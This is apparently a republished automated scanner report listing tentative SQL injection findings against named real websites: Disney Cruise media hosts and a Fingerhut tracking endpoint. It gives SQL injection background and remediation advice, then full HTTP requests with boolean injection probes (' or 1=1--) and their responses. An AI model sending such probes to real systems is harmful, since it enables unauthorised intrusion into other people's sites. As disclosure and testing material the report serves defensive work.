XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-02

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://dcl.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 38734480'%20or%201%3d1--%20 and 38734480'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media38734480'%20or%201%3d1--%20/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:11 GMT
Content-Length: 102641
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">

       <div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & Stars">Characters & Stars</a></li>
               <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go.com/games/#/games/" title="Games">Games</a></li>
               <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go.com/videos/#/videos/" title="Videos">Videos</a></li>
               <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go.com/create/#/create/" title="Create">Create</a></li>
               <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go.com/mypage/#/mypage/" title="My Page">My Page</a></li>
           </ul>
       </div>
   </div>
   <div id="gde_chromeDataSearch">
       <a href="http://disney.go.com/search/?q=" searchURL="http://disney.go.com/search" title="Search Disney.com">Search Disney.com</a>
   </div>
</div>
<script language="javascript" type="text/javascript">
var _gdeChrome = ne
...[SNIP]...

Request 2

GET /media38734480'%20or%201%3d2--%20/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png?t=1285273951103 HTTP/1.1
Host: dcl.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:11 GMT
Content-Length: 33396
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<div id="DOLChrome">

           </div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd>
                   <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd>
               </dl>
           </form>
       </div>
       <div id="forgotPassForm" class="flyoutForm">
           <form method="post" action="/forgot-password/" id="forgotPasswordFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd>
                   <dt><label for="flyoutLastName">Last Name:</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd>
                   <dt><label for="birthDay">Your Birthday:</label></dt>
               <dd class="required birthday">
                       <select name
...[SNIP]...

1.2. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://dcl2.wdpromedia.com
Path:	/concat/4.39.1.5/css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15929969'%20or%201%3d1--%20 and 15929969'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /concat15929969'%20or%201%3d1--%20/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:17 GMT
Content-Length: 102597
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>

</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>



<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>

<div id="DOLChrome">


<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

Request 2

GET /concat15929969'%20or%201%3d2--%20/4.39.1.5/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:17 GMT
Content-Length: 33352
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>

</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>



<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>

<div id="DOLChrome">





</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

1.3. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20163560'%20or%201%3d1--%20 and 20163560'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media20163560'%20or%201%3d1--%20/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 102631
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>

</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>



<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>

<div id="DOLChrome">


<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

Request 2

GET /media20163560'%20or%201%3d2--%20/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 33386
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>

</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>



<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>

<div id="DOLChrome">





</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

1.4. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://dcl2.wdpromedia.com
Path:	/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media'%20and%201%3d1--%20/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:27 GMT
Content-Length: 33405
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>

</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>



<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>

<div id="DOLChrome">





</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

Request 2

GET /media'%20and%201%3d2--%20/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:27 GMT
Content-Length: 102650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>

</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>



<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>

<div id="DOLChrome">


<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

1.5. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mboxSession parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://fingerhut.tt.omtrdc.net
Path:	/m2/fingerhut/mbox/standard

Issue detail

The mboxSession parameter appears to be vulnerable to SQL injection attacks. The payloads 18153420'%20or%201%3d1--%20 and 18153420'%20or%201%3d2--%20 were each submitted in the mboxSession parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-47884618153420'%20or%201%3d1--%20&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcome&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 728
Date: Mon, 16 May 2011 01:34:28 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_welcome',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-F
...[SNIP]...
